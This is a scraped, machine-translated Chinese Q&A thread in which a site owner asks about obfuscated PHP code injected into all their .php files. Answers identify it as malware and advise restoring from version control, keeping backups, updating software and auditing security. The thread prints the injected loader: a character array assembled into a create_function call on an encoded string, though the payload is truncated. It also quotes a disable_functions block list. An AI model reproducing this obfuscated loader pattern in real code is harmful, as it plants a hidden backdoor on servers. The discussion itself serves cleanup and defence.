我所有的.php文件中都有一段代码?
毫无疑问,这段代码是在我服务器上的所有我所有的.php文件中都有一段代码?,php,mysql,Php,Mysql,毫无疑问,这段代码是在我服务器上的所有.php文件中自动创建的 <?php $md5 = "a706891c46c31c80594f989327e52c0d"; $a7 = array(';','6','i','l',"z",'4','t',')','e',"b",'(','_',"o","g","a","r","n","s"); $b70 = create_function('$'.'v',$a7[8].$a7[18].$a7[4].$a7[19].$a7[6].$a7[
.php
文件中自动创建的
<?php
$md5 = "a706891c46c31c80594f989327e52c0d";
$a7 = array(';','6','i','l',"z",'4','t',')','e',"b",'(','_',"o","g","a","r","n","s");
$b70 = create_function('$'.'v',$a7[8].$a7[18].$a7[4].$a7[19].$a7[6].$a7[7].$a7[7].$a7[0]);
$b70('DZdFsoUKEkSX0/8HA/wC0SPc3Zl04O7/4f');
?>
(完整代码)
我试图从所有.php
文件中手动删除它,但是当涉及到setup.php
(连接到MySQL的文件)时,如果我从那里删除它,网站将停止工作。我不知道如何移除它。如果我保持原样会有什么后果?这是什么?它是如何进入的?这是一个恶意软件
本文提供了有关恶意软件的有用信息
以下是删除它的说明
最好的方法是从版本控制系统中恢复。你没有吗?这是你解决的第一件事。版本控制是必不可少的 下一步是与备份进行比较,以查看何时进行了此更改。你没有备份吗?这是你要解决的下一件事
最后,您应该确保您的应用软件是最新的,您运行的是最新版本的web服务器和PHP。立即进行安全审计。如果你不知道如何做到这一点,找一个可以得到支持的人。如果你被攻击了,很有可能是谁干的,他会回来检查他们的工作,如果可能的话,可能会再次攻击你。你可能被攻击了。什么??如何删除它?立即用备份文件替换服务器上的每个文件,并且备份文件具有允许这种情况发生的漏洞,因此这可能也不会对您有特别的帮助。如果您好奇,此代码“解码”为:thaks o lot。我在php.ini中添加了这一行
disable_functions=create_function、gzflate、eval、base64_decode
,非常感谢您的帮助。我在php5.ini中添加了这一行disable_functions=create_function,gzflage,eval,base64_decode
,它应该阻止它吗?它阻止一些攻击,但不是所有攻击。这些攻击的复杂程度各不相同,从尝试自动驾驶到有人挑出您的系统并试图在其上托管某些东西。确保的唯一方法是查找对应用程序代码的更改git diff
可以在瞬间完成此操作。